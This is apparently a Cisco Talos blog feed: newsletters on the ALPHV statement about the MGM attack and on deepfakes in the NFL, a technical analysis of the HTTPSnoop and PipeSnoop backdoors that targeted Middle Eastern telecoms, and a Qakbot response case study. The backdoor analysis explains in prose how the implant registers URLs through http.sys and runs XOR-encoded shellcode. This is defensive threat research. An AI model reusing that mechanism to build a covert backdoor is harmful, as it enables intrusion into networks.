Normal view

There are new articles available, click to refresh the page.
Before yesterdayCisco Talos

What’s the point of press releases from threat actors?

21 September 2023 at 18:00
What’s the point of press releases from threat actors?

Welcome to this week’s edition of the Threat Source newsletter.

As a former reporter, I’ve seen my fair share of press releases. But one from a threat actor was definitely a new one for me last week.

ALPHV (aka BlackCat) publicly took credit for a massive cyber attack against MGM, a resort, gambling and sports betting company best known for its massive casinos. The attack took down slot machines, guest reservation systems, and more belonging to MGM, and the company is still feeling the effects as of Tuesday.

And despite every major news outlet reporting on the incident, the actor wanted to take messaging into its own hands and “clarify” what happened exactly. Attackers have occasionally posted updates and pseudo-press releases in the past, but this particular press release on ALPHV’s leak site (don’t worry I didn’t actually link to their site) was peak unintentional comedy to me.

For starters, the actor blamed MGM for not using their official communication channels to contact them to start negotiating a ransom payment:

“As they were not responding to our emails with the special link provided (In order to prevent other IT Personnel from reading the chats) we could not actively identify if the user in the victim chat was authorized by MGM Leadership to be present,” the statement reads.

They also said that, hypothetically, if personally identifiable information *had* been stolen, they would allow the website Have I Been Pwned? to responsibly disclose this information, even though they stopped short of saying they stole PII.

Lastly, they took a victory lap by saying several news outlets had reported false information, claimed attribution too early, or made ALPHV seem too basic of a threat actor because the tactics, techniques and procedures “used by the people they blame for the attacks are known to the public and are relatively easy for anyone to imitate.”

The entire statement reads as someone who thinks they’ve done nothing wrong, and certainly written to intimate that the situation could have gone much more smoothly had MGM just reached out to the threat actor early on through what is deemed as the appropriate channels and negotiated early.

So, it makes me wonder what ALPHV thinks they’re gaining from all this? Part of me wonders if they were upset that public reporting had connected the attack to a group called “'Scattered Spider” and they wanted to make sure everyone knew who deserved the credit. Or it could have been that they wanted to turn up the heat on MGM representatives and apply public pressure to hopefully get them to communicate and settle on a ransom payment.

It reads as if ALPHV really wants to come across as the “good guys” in this case, but I’m not sure who outside of dark web circles would be willing to feel sorry for them.

The one big thing

Talos researchers recently discovered a new malware family we’re calling “HTTPSnoop” being deployed against telecommunications providers in the Middle East. HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint. We also discovered a sister implant to “HTTPSnoop” we’re naming “PipeSnoop,” which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint. All these new tools are linked to a group we’re calling “ShroudedSnooper.”

Why do I care?

This activity is a continuation of a trend we have been monitoring over the last several years in which sophisticated actors are frequently targeting the telecommunications sector. This sector was consistently a top-targeted industry vertical in 2022, according to Cisco Talos Incident Response data. However, since this is a new, relatively unknown group, we can’t be certain that they’ll only stick to targeting this particular field. The various malware at their disposal can leave a backdoor on infected machines for future attacks and malware installations and execute arbitrary shellcode on the infected endpoint.

So now what?

We found specific URL patterns that make it look like the infected system being contacted is a server hosting Microsoft’s Exchange Web Services (EWS) API. The URLs consisted of “ews” and “autodiscover” keywords over Ports 443 and 444. The blog post has a list of these patterns so potentially affected targets can scan to see if they're infected. There is also a host of detection content available for Cisco Secure products.

Top security headlines of the week

Apple released long-awaited updates to its “Lockdown Mode” with iOS 17 this week, its answer to a recent global uptick in spyware attacks. Lockdown Mode now also works on Apple Watches, in addition to iPhones and iPads, which is notable because threat actors have increasingly started targeting Apple Watches with spyware. New features also remove geolocation information from photos when Lockdown Mode is enabled and automatically block insecure Wi-Fi networks. Apple and other cellphone manufacturers are working on addressing the use of cell site simulators, also known as “stingrays.” These fake cell base stations track phone locations and spy on calls and messages after a device connects to it. Google also announced new features earlier this year that ensure their devices’ communications are always encrypted when connecting to cell towers. (TechCrunch, Electronic Frontier Foundation)

The U.S. Cybersecurity and Infrastructure Security Agency announced a new program offering free security scans to public water utilities and other critical infrastructure. CISA is offering to run specialized scanners to identify a facility’s vulnerabilities and any weak configurations on internet-exposed endpoints. Then, they generate a report of any flaws or vulnerabilities found and send the plant a list of recommendations and offers for further scans to determine if the potential target has taken the appropriate steps to solve the issues. A brochure for the new program promises a “significant reduction in identified vulnerabilities in the first few months of scanning for newly enrolled water utilities.” (StateScoop, CISA)

China’s government has accused the U.S. of a campaign to infiltrate servers belonging to tech company Huawei to conduct cyber attacks and steal information, potentially as far back as 2009. China's Ministry of State Security on Wednesday outlined the accusations in a post on its WeChat account Wednesday. "In 2009, the Office of Tailored Access Operations started to infiltrate servers at Huawei's headquarters and continued conducting such surveillance operations," the post reads. China and the U.S. have continually launched accusations of spying on one another this year as tensions between the two nations rise. China also accused the U.S. National Security Agency of installing a backdoor tool that "runs secretly on thousands of network devices in many countries around the world” meant to steal data from other governments, including China and Russia. (Nikkei Asia, The Register)

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 7f66d4580871e3ee6a35c8fef6da7ab26a93ba36b80279625328aaf184435efa
MD5: e9a6b1346d1a2447cabb980f3cc5dd27
Typical Filename: профиль 10 класс.exe
Claimed Product: N/A
Detection Name: Application_Blocker

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934
MD5: 93fefc3e88ffb78abb36365fa5cf857c
Typical Filename: Wextract
Claimed Product: Internet Explorer
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

SHA 256: bea312ccbc8a912d4322b45ea64d69bb3add4d818fd1eb7723260b11d76a138a
MD5: 200206279107f4a2bb1832e3fcd7d64c
Typical Filename: lsgkozfm.bat
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::tpd

SHA 256: e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c
MD5: a087b2e6ec57b08c0d0750c60f96a74c
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Tool.Kmsauto::1201

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants

19 September 2023 at 12:00
  • Cisco Talos recently discovered a new malware family we’re calling “HTTPSnoop” being deployed against telecommunications providers in the Middle East.
  • HTTPSnoop is a simple, yet effective, backdoor that consists of novel techniques to interface with Windows HTTP kernel drivers and devices to listen to incoming requests for specific HTTP(S) URLs and execute that content on the infected endpoint.
  • We also discovered a sister implant to “HTTPSnoop” we’re naming “PipeSnoop,” which can accept arbitrary shellcode from a named pipe and execute it on the infected endpoint.
  • We identified DLL- and EXE-based versions of the implants that masquerade as legitimate security software components, specifically extended detection and response (XDR) agents, making them difficult to detect.
  • We assess with high confidence that both implants belong to a new intrusion set we’re calling “ShroudedSnooper.” Based on the HTTP URL patterns used in the implants, such as those mimicking Microsoft’s Exchange Web Services (EWS) platform, we assess that this threat actor likely exploits internet-facing servers and deploys HTTPSnoop to gain initial access.
  • This activity is a continuation of a trend we have been monitoring over the last several years in which sophisticated actors are frequently targeting telecoms. This sector was consistently a top-targeted industry vertical in 2022, according to Cisco Talos Incident Response data.

ShroudedSnooper activity highlights latest threat to telecommunications entities

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants

This specific cluster of implants involving HTTPSnoop and PipeSnoop and associated tactics, techniques, and procedures (TTPs) do not match a known group that Talos tracks. We are therefore attributing this activity to a distinct intrusion set we’re calling “ShroudedSnooper.”

In recent years, there have been many instances of state-sponsored actors and sophisticated adversaries targeting telecommunications organizations around the world. In 2022, this sector was consistently a top-targeted vertical in Talos IR engagements. Telecommunications companies typically control a vast number of critical infrastructure assets, making them high-priority targets for adversaries looking to cause significant impact. These entities often form the backbone of national satellite, internet and telephone networks upon which most private and government services rely. Furthermore, telecommunications companies can serve as a gateway for adversaries to access other businesses, subscribers or third-party providers.

Our IR findings are consistent with reports from other cybersecurity firms outlining various attack campaigns targeting telecommunications companies globally. In 2021, CrowdStrike disclosed a years-long campaign by the LightBasin (UNC1945) advanced persistent threat (APT) targeting 13 telecommunications companies globally using Linux-based implants to maintain long-term access in compromised networks. That same year, McAfee discovered activity targeting telecommunication firms in Europe, the U.S. and Asia dubbed “Operation Diànxùn” linked to the Chinese APT group MustangPanada (RedDelta). This campaign heavily relied on the PlugX malware implant. Also in 2021, Recorded Future reported that four distinct Chinese state-sponsored APT groups were targeting the email servers of a telecommunications firm in Afghanistan, again using the PlugX implant.

The targeting of telecommunications firms in middle-east Asia is also quite prevalent. In January 2021, Clearsky disclosed the “Lebanese Cedar” APT leveraging web shells and the “Explosive” RAT malware family to target telecommunication firms in the U.S., U.K. and middle-east Asia. In a separate campaign, Symantec noted the MuddyWater APT targeting telecommunication organizations in the Middle East, deploying web shells on Exchange Servers to instrument script-based malware and dual-use tools to carry out hands-on-keyboard activity.

Masquerading as a security component

We also discovered both HTTPSnoop and PipeSnoop masquerading as components of Palo Alto Networks’ Cortex XDR application. The malware executable is named “CyveraConsole.exe,” which is the application that contains the Cortex XDR agent for Windows. The variants of both HTTPSnoop and PipeSnoop we discovered had their compile timestamps tampered with but masqueraded as XDR agent from version 7.8.0.64264. Cortex XDR v7.8 was released on Aug. 7, 2022, and decommissioned on April 24, 2023. Therefore, it is likely that the threat actors operated this cluster of implants during the aforementioned timeframe. For example, one of the “CyveraConsole.exe” implants was compiled on Nov. 16, 2022, falling approximately in the middle of this time window of the life of Cortex XDR v7.8.

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants
Version information of HTTPSnoop sample with fake Cortex XDR information.

A primer on HTTPSnoop

HTTPSnoop is a simple, yet effective, new backdoor that uses low-level Windows APIs to interact directly with the HTTP device on the system. It leverages this capability to bind to specific HTTP(S) URL patterns to the endpoint to listen for incoming requests. Any incoming requests for the specified URLs are picked up by the implant, which then proceeds to decode the data accompanying the HTTP request. The decoded HTTP data is, in fact, shellcode that is then executed on the infected endpoint.

HTTPSnoop consists of the same code across all observed variants, with the key difference in samples being the URL patterns that it listens for. So far, we have discovered three variations in the configuration:

  • Generic HTTP URL-based: Listens for generic HTTP URLs specified by the implant.
  • EWS-related URLs listener: Listen for URLs that mimic Microsoft’s Exchange Web Services (EWS) API.
  • OfficeCore’s Location Based Services (LBS)-related URL listener: Listens for URLs that mimic OfficeCore’s LBS/OfficeTrack and telephony applications.

HTTPSnoop variants

The DLL-based variants of HTTPSnoop usually rely on DLL hijacking in benign applications and services to get activated on the infected system. The attackers initially crafted the first variant of the implant on April 17, 2023, so that it could bind to specific HTTP URLs on the endpoint to listen for incoming shellcode payloads that are then executed on the infected endpoint. These HTTP URLs resemble those of Microsoft’s Exchange Web Services (EWS) API, a product that enables applications to access mailbox items.

A second variant, generated on April 19, 2023, is nearly identical to the initial version of HTTPSnoop from April 17. The only difference is that this second variant is configured to listen to a different set of HTTP URLs on Ports 80 and 443 exclusively, indicating that the attackers may have intended to focus on a separate non-EWS internet-exposed web server.

The attackers then built a third variant that consisted of a killswitch URL and one other URL that the implant listens to. This implant was crafted on April 29, 2023. This version of the implant was likely an effort to minimize the number of URLs that the implant listens to, to reduce the likelihood of detection.

HTTPSnoop analysis

The DLL analyzed simply consists of two key components:

  • Encoded Stage 2 shellcode.
  • Encoded Stage 2 configuration.

The malicious DLL on activation will XOR decode the Stage 2 configuration and shellcode and run it.

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants
Single byte XOR routine to decode Stage components.

Stage 2 analysis

Stage 2 is a single-byte XOR’ed backdoor shellcode that uses the accompanying configuration data to listen for incoming shellcode to execute on the infected endpoint. As part of Stage 2, the sample proceeds to make numerous calls to kernel devices in order to set up a web server endpoint for its backdoor. The implant opens a handle to “\Device\Http\Communication” and calls the HTTP driver API “http.sys!UlCreateServerSession” with IOCTL code 0x1280000to initialize the connection to the HTTP server. The sample continues by creating a new URL group using http.sys!UlCreateUrlGroup with IOCTL code 0x128010 opens a request queue device “\Device\Http\ReqQueue” and sets the new URL group for the session using http.sys!UlSetUrlGroupwith IOCTL code 0x12801d.

Using the decrypted configuration the sample begins to feed the URLs to the HTTP server via http.sys!UlAddUrlToUrlGroup with IOCTL code l 0x128020. This binds the specified  URL patterns to a listenable endpoint for the malware to communicate. The implant takes care to not overwrite already existing URL patterns being serviced by the HTTP server, to coexist with previous configurations on the server, such as EWS and prevent URL listener collisions.

With the URLs bound to listen on the kernel’s web server, the malware proceeds to listen in a loop for incoming HTTP requests, carried out via http.sys!UlReceiveHttpRequest. If the headers from the HTTP request contain a configured keyword, in this particular sample’s case, “api_delete”, the listening loop for the infection will terminate. Once a request comes in, it creates a new thread and calls http.sys!UlReceiveEntityBody with IOCTL codes 0x12403b, or 0x12403a when running Windows Server 2022 version 21H2, to receive the full message body from the implant operator. If the request has valid data, the sample proceeds to process the request or else returns an HTTP 302 Found redirect response to the requester.

Valid data comes in the form of a base64-encoded request body. Upon decoding, it proceeds to use the first byte of data to single-byte XOR-decode the rest of the data. Once decrypted, a simple data structure is unveiled. The payload received from the operator is an arbitrary shellcode payload. The execution metadata consists of an uninitialized pointer and size, plus the size of the metadata structure, which is a constant 0x18. These uninitialized pointers are initialized by the execution of the shellcode, used to pass back data to the implant to eventually send back to the operator as a response to the HTTP request.

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants
Payload structure from C2.

The ultimate result of the execution of the arbitrary shellcode is returned to the requester (operator) in the form of a base64-encoded XOR-encoded blob. The first byte of the response is a random letter from the ASCII table, which is used to XOR the rest of the response. With this, the malware sends back a 200 OK response with the encoded execution result in its body via http.sys!UlSendHttpResponsewith IOCTL code  0x12403f.

Introducing PipeSnoop

The PipeSnoop implant, created in May 2023, is a simple implant that can run arbitrary shellcode payloads on the infected endpoint by reading from an IPC pipe. Although semantically similar, the PipeSnoop implant should not be considered an upgrade of HTTPSnoop. Both implants are likely designed to work under different environments. The HTTP URLs used by HTTPSnoop along with the binding to the built-in Windows web server indicate that it was likely designed to work on internet-exposed web and EWS servers. PipeSnoop, however, as the name may imply, reads and writes to and from a Windows IPC pipe for its input/output (I/O) capabilities This suggests the implant is likely designed to function further within a compromised enterprise--instead of public-facing servers like HTTPSnoop — and probably is intended for use against endpoints the malware operators deem more valuable or high-priority. PipeSnoop is likely used in conjunction with another component that is capable of feeding it the required shellcode. (This second component is currently unknown.)

PipeSnoop analysis

PipeSnoop is a simple backdoor that, much like HTTPSnoop, aims to act as a backdoor executing arbitrary shellcode on the infected endpoint. In contrast to HTTPSnoop however, PipeSnoop does not rely on initiating and listening for incoming connections via an HTTP server. As indicated by the name, PipeSnoop will simply attempt to connect to a pre-existing named pipe on the system. Named pipes are a common means of Inter-Process Communication (IPC) on the Windows operating system. The key requirement here is that the named pipe that PipeSnoop connects to should have been already created/established - PipeSnoop does not attempt to create the pipe, it simply tries to connect to it. This capability indicates that PipeSnoop cannot function as a standalone implant (unlike HTTPSnoop) on the endpoint. It needs a second component, that acts as a server that will obtain arbitrary shellcode via some methods and will then feed the shellcode to PipeSnoop via the named pipe.

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants
Implant connecting to a named pipe to obtain arbitrary shellcode.

Masquerading as benign traffic on the wire

We’ve observed HTTPSnoop listening for URL patterns that make it look like the infected system being contacted is a server hosting Microsoft’s Exchange Web Services (EWS) API. The URLs consisted of “ews” and “autodiscover” keywords over Ports 443 and 444:

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants

Some of the HTTPSnoop implants use HTTP URLs that masquerade as those belonging to OfficeTrack, an application developed by software company OfficeCore that helps users manage different administrative tasks. In several instances, we see URLs ending in “lbs” and “LbsAdmin,” references to the application’s earlier name (OfficeCore’s LBS System) before it was later rebranded as OfficeTrack. OfficeTrack is currently marketed as a workforce management solution geared toward providing coverage for logistics, order orchestration and equipment control. OfficeTrack is especially marketed towards telecommunication firms. Some of the LBS URLs used by HTTPSnoop are:

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants

The HTTP URLs also consist of patterns mimicking provisioning services from an Israeli telecommunications company. This telco may have used OfficeTrack in the past and/or currently uses this application, based on open-source findings.

Some of the URLs in the HTTPSnoop implant are also related to those of systems from the telecommunications firm:

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants

Coverage

Ways our customers can detect and block this threat are listed below.

New ShroudedSnooper actor targets telecommunications firms in the Middle East with novel Implants

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Note: We have shared our findings with both Microsoft and Palo Alto Networks for this threat and intrusion set.

ClamAV detections are available for this threat:
Win.Trojan.WCFBackdoor

Indicators of Compromise (IOCs)

Indicators of Compromise associated with this threat can be found here.

Turns out even the NFL is worried about deepfakes

14 September 2023 at 18:00
Turns out even the NFL is worried about deepfakes

Welcome to this week’s edition of the Threat Source newsletter.

I’m at the point in the calendar year where I’m a sponge for NFL content. I couldn’t be happier to escape from my six-month American football-free slumber and am ready to watch games three days a week and listen to NFL podcasts or read power rankings the other four.

So of course, I wasn’t going to miss this feature in Dark Reading from the NFL’s chief information security officer, which just happens to include several shoutouts to Talos and Cisco. Talos is a valuable security partner with the NFL, helping secure their major events like the NFL Draft and Super Bowl, the most-watched entertainment event in the U.S. every year.

One of the things that Tomás Maldonado said in the Dark Reading interview really stood out to me — that he’s worried about deepfakes of NFL players being used in scams. Deepfakes have been making the rounds for years in scams of celebrities and politicians seeming to ask for various things (often money), and Maldonado said he’s worried that attackers could start using the likenesses of popular NFL players for scams and spam.

I actually hadn’t realized that deepfakes had already been around in the NFL sphere for a while, though.

In an ESPN “30 for 30” documentary in 2021, the creators used deepfake, AI voices for former Raiders owner Al Davis and former commissioner Pete Rozelle, who both died many years before the creation of this documentary. Public reception was mixed, at best.

The league’s Dallas Cowboys are also jumping on the AI train and created a hologram, AI-powered version of team owner Jerry Jones. Fans can pay $55 to take a tour of the Cowboys’ AT&T Stadium and ask the AI version of Jones questions (as a Browns fan, I mainly would just like to thank him for only asking for a fifth-round pick in exchange for receiver Amari Cooper).

Bad actors have shown they will literally use any and all forms of deepfakes to try and trick users. So it’s not hard to see where Maldonado is coming from with his concerns.

With the popularity of pay-for-shoutout services like Cameo, it’d be fairly easy for someone to develop a convincing enough deepfake of a player and try to steal someone’s money by saying they could prank their fantasy football league for $50. This just isn’t a particular attack vector I had considered before — I always assumed deepfakes were reserved for political leaders or some of the highest-profile people in the world.

And while I couldn’t find any current examples of where this is actively happening in the wild, it’s not a crazy jump to think that if ESPN can create a convincing AI version of Al Davis that someone else can’t make an AI voice that sounds just like Aaron Rodgers asking for money or a fake Russell Wilson pushing season ticket “deals.”

The one big thing

Microsoft disclosed two zero-day vulnerabilities as part of this monthly security update on Tuesday, one of which already has proof-of-concept code floating around in the wild. There are five other critical vulnerabilities included in September’s Patch Tuesday, which is relatively low for a traditional Microsoft security release, and 56 vulnerabilities the company considers “important.”

Why do I care?

One of the vulnerabilities adversaries are already exploiting in the wild is CVE-2023-36802, an elevation of privilege vulnerability in Microsoft Streaming Service, a corporate video sharing platform integrated into SharePoint and Office 365. An adversary who successfully exploits this vulnerability can gain SYSTEM privileges. Additionally, CVE-2023-36761 has already been exploited in the wild and proof of concept code is publicly available. Although it is not clear how exactly an attacker could exploit this vulnerability in Microsoft Word, Microsoft states that the Preview Pane is also a potential attack vector in this case. If successful, an adversary could view NTLM hashes. Microsoft’s warnings about these vulnerabilities indicate attackers are already exploiting these issues in the wild, even prior to Tuesday’s patch, so all users should be sure to patch these ASAP.

So now what?

Microsoft’s security update guide has all the patches users need to install, which everyone should do now if they haven’t already. Talos’ Patch Tuesday blog also outlines several Snort rules we released to detect the exploitation of some of these vulnerabilities.

Top security headlines of the week

Apple released a series of security updates over the past week that users of all the companies’ mobile devices are encouraged to install as soon as possible. A security update on Sept. 7 warned that users needed to update to iOS 16.6.1 or iPadOS 16.6.1 right away to fix security updates that attackers were actively exploiting in the wild. In some cases, these exploits led to the installation of spyware on targeted devices. Apple said in an advisory that, “Processing a maliciously crafted image may lead to arbitrary code execution.” The company followed that up with another security update on Monday for older models of iPhones, iPads, Macs and other Apple devices that "provides important security fixes,” likely the same vulnerabilities. Apple was scheduled to announce its newest iPhone and Apple Watch at an event Wednesday. (USA Today, CNET)

The U.S. and U.K. have sanctioned more alleged members of the Trickbot cybercrime ring. Law enforcement officials in both countries announced sanctions against 11 individuals they claim are “involved in management and procurement for the Trickbot group.” Trickbot is known for targeting large businesses and organizations with ransomware and has alleged ties to the Russian government. Seven of the people listed are also charged with working with the Conti ransomware group, which broke up at the end of 2022. These people are alleged "administrators, managers, developers, and coders” for Conti. The U.K.’s National Crime Agency reported that Trickbot attacks have generated an estimated $180 million from victims, $33.6 million of that coming from victims in the U.K. The group’s list of reported victims includes hospitals, schools and government agencies across the globe. (TechCrunch, Dark Reading)

Security researchers are concerned that adversaries are starting to crack stolen passkeys taken during a data breach at LastPass. More than 150 people recently affected by cryptocurrency wallet thefts were LastPass users, leading to the equivalent of $35 million in virtual currency being stolen. Many cryptocurrency consumers use security phrases to protect their wallets, and then store that phase in an encrypted folder inside a password manager like LastPass. If an attacker were able to learn that phrase, they could essentially access all the victims’ cryptocurrency holdings tied to that key. LastPass has yet to comment on the researchers’ findings because they said an active law enforcement investigation is still ongoing into the 2022 breach. (Krebs on Security, The Verge)

Can’t get enough Talos?

Upcoming events where you can find Talos

LABScon (Sept. 20 - 23)

Scottsdale, Arizona

Vitor Ventura gives a presentation that’s a detailed account and timeline of one such mercenary organization, from almost bankrupt to having a fully working spyware targeting iOS and Android with one-click zero-day exploit.

Grace Hopper Celebration (Sept. 26 - 29)

Orlando, Florida

Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation.

ATT&CKcon 4.0 (Oct. 24 - 25)

McLean, Virginia

Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

SHA 256: d5763a87ec22a583b9dd853e31a9d4cb187d81251ce51099ce3d0f749bbf405a
MD5: 5cedec562076ac629453cc99dd0cdda6
Typical Filename: nYzVlQyRnQmDcXk
Claimed Product: N/A
Detection Name: W32.Auto:d5763a.in03.Talos

SHA 256: 4c3c7be970a08dd59e87de24590b938045f14e693a43a83b81ce8531127eb440
MD5: ef6ff172bf3e480f1d633a6c53f7a35e
Typical Filename: iizbpyilb.bat
Claimed Product: N/A
Detection Name: Trojan.Agent.DDOH

SHA 256: d5219579eec1819d52761730a72ce7a95ee3f598fcfd9a4b86d1010ea103e827
MD5: bf357485cf123a72a46cc896a5c4b62d
Typical Filename: bf357485cf123a72a46cc896a5c4b62d.virus
Claimed Product: N/A
Detection Name: W32.Auto:d5219579ee.in03.Talos

SHA 256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91
MD5: 7bdbd180c081fa63ca94f9c22c457376
Typical Filename: c0dwjdi6a.dll
Claimed Product: N/A
Detection Name: Trojan.GenericKD.33515991

How Cisco Talos IR helped a healthcare company quickly resolve a Qakbot attack

14 September 2023 at 12:00

Partnership and proactive measures reduce resolution time from weeks to mere hours.

How Cisco Talos IR helped a healthcare company quickly resolve a Qakbot attack

Healthcare is one of the most popular targets for threat actors, as evidenced by the fact that it was the most-targeted sector in each of Cisco Talos Incident Response’s past two Quarterly Trends Reports.

But if these organizations are ready for when, not if, an incident occurs, they can avoid the worst-case scenario of potentially losing money, risking patient safety, or dealing with technology downtime.

Veradigm is a healthcare technology company that drives value through its unique combination of platforms, data, expertise, connectivity, and scale. The Veradigm Network features a dynamic community of solutions and partners providing advanced insights, technology, and data-driven solutions, all working together to transform healthcare insightfully. Veradigm recently detected an intrusion and potential information-stealing attack before bad actors could execute their plan.

Thanks to the Cisco Talos Incident Response Retainer service, Veradigm detected a potential Qakbot infection early, and with the help of the Cisco Talos Incident Response (Talos IR) team, evicted the threat actor from their network quickly before any harm could come to the organization or its customers.

Veradigm has partnered with Cisco for technology and services for years, with the ongoing goal of making Veradigm’s systems and network more resilient – the ability to protect every aspect of their business, withstand unpredictable threats or changes, and emerge stronger.

A few months ago, their team acted quickly when they noticed a potential security incident in a development environment and immediately reached out to Talos IR for assistance. The Talos IR team helped them swiftly deal with the attack which included attempts to deploy the modular information-stealer Qakbot.

Veradigm and the Talos IR team worked together to determine that adversaries had attempted to established command & control (C2) via DNS, and although Veradigm had the affected system isolated via Cisco Secure Endpoint with default settings, they found that the DNS traffic was not stopped by default. However, the traffic was blocked by Cisco Umbrella until the team could modify the isolation policy to stop the DNS beaconing.  Veradigm’s ability to prevent C2 highlights the value of their robust defense-in-depth strategy.  The adversary attempted to penetrate the network, but due to the security controls and quick response, could not successfully deploy Qakbot.

This incident was resolved in hours, not days or weeks, because of Talos IR’s established relationship with Veradigm. The Talos IR team shared remediation recommendations to Veradigm to implement in the event threat actors attempted another intrusion. The swift action of the Talos IR team, coupled with the proactive preparation of the Veradigm team, resulted in a faster and more efficient response to the incident.

Dr. Jeremy Maxwell, the CSO at Veradigm touted, “We avoided worst case scenario due to our experience, practices, and relationships … by having the ‘good guys’ from Cisco join with our ‘good guys,’ we can navigate each situation to success.”

This is one of many customer success stories in which Talos IR sees, responds, and helps organizations across the globe fortify their readiness and defense.

The recent Cisco Cybersecurity Readiness Index study found that a mere 15% of organizations globally are deemed to have a mature level of preparedness to handle security risks. Those in the sectors with the most to lose tend to have more companies in the mature state of readiness, including healthcare (18%) and financial services (19%).

How Cisco Talos IR helped a healthcare company quickly resolve a Qakbot attack

Dr. Maxwell said that because of his company’s retainer with Talos IR, he was lucky enough to count his company among those organizations who were ready for a cyber-attack.

“Working in a highly regulated domain, it is important that we establish good relationships with all partners, but incident response in particular,” Maxwell said. “We have been partnering with Cisco Talos IR since 2017, and across that time we have established a solid relationship with the same cast of characters through both proactive and reactive incidents. This has built a special level of trust and efficiency in response when we have those knowledgeable about our unique environment on our side and ready to be there.”

Veradigm chose Cisco Secure solutions based on several factors: the ease of integration with their existing hosting and corporate environment tools, plus being known in the industry as a strong performer. It just made sense, then, to partner with Talos IR for their incident response needs.

“With the [Talos IR] retainer service we really appreciate established and met Service Level Agreements (SLAs). Plus, the knowledge of Cisco’s IR team on our unique environment, prior incidents, and their intelligence on the latest threats ensure we smoothly navigate, and balance preparation exercises and incidents based on our unique needs. Time to response in our SLA along with the unique knowledge, there isn’t a delay as one would expect. They are ready and we have ‘muscle memory’ from both tabletop scenarios and real-life situations. As a result of being in the highly regulated world of healthcare and with the constant need to consider patient safety, our circumstances can be tense from the start. They know how we need to react based on both exercises and incidents and can navigate smoothly in delicate situations/balances with our unique needs in mind,” Jeremy Maxwell, Veradigm CISO.

Having a trusted partner on Veradigm’s side who knows their environment, popular attacker tactics, techniques, and procedures (TTPs) and is familiar with regulatory obligations of the healthcare sector meant both sides could work together to achieve more. The strong connection is based on a solid foundational relationship grounded in expediency and knowledge, according to Maxwell.

